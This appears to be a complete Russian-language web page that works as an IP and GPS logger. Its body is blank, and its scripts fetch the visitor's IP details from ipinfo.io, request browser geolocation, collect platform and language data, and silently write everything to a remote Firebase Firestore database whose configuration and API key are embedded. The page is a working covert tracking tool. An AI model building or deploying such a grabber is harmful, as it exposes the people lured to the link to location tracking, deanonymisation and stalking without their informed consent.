<!DOCTYPE html>
<html lang="ru">
<head>
  <meta http-equiv="Content-Type" content="text/html"; charset="utf-8"/>
<title>Определение ip и gps</title>
<meta name="viewport" http-equiv="Content-Type" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, text/html" charset="UTF-8"/>
<link href="styles/style.css" rel="stylesheet" type="text/css" media="all">
<link rel="icon" href="images/favicons/home1.png" type="image/x-icon">
</head>
<body id="top">
<script src="js/jquery.min.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.22.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.22.0/firebase-firestore.js"></script>
<script>
initF()
// Initialize Firebase
async function initF() {
  // Your web app's Firebase configuration
    let firebaseConfig = {
        apiKey: "AIzaSyDidHqKWI8FyTqSRzUx3JEENDi5g3gS_10",
        authDomain: "robotix-com.firebaseapp.com",
        databaseURL: "https://robotix-com.firebaseio.com",
        projectId: "robotix-com",
        storageBucket: "robotix-com.appspot.com",
        messagingSenderId: "596568656412",
        appId: "1:596568656412:web:a914aebdeb20667c246dd9"
    };
    await firebase.initializeApp(firebaseConfig)
    window.db = firebase.firestore();
    $.get("https://ipinfo.io", function(response) {
        writeIP(response);
        //
    }, "json");
}
// "json" shows that data will be fetched in json format
async function writeIP(data) {
    data.platform = navigator.platform;
    data.langs = navigator.languages;
    try {
        navigator.geolocation.getCurrentPosition((position) => {
            data.coords = {lat: position.coords.latitude, lon: position.coords.longitude, acc: position.coords.accuracy}
            data.timestamp = position.timestamp;
            let data1 = {};
            data1['i'] = data;
            window.db.collection("ips").doc("ips").set(data1, { merge: true });
        })
    } catch (e) {
        data.position = data.loc;
        let data1 = {};
        data1['i'] = data;
        await window.db.collection("ips").doc("ips").set(data1, { merge: true });
        console.log(e);
    }
}
</script>
</body>
</html>
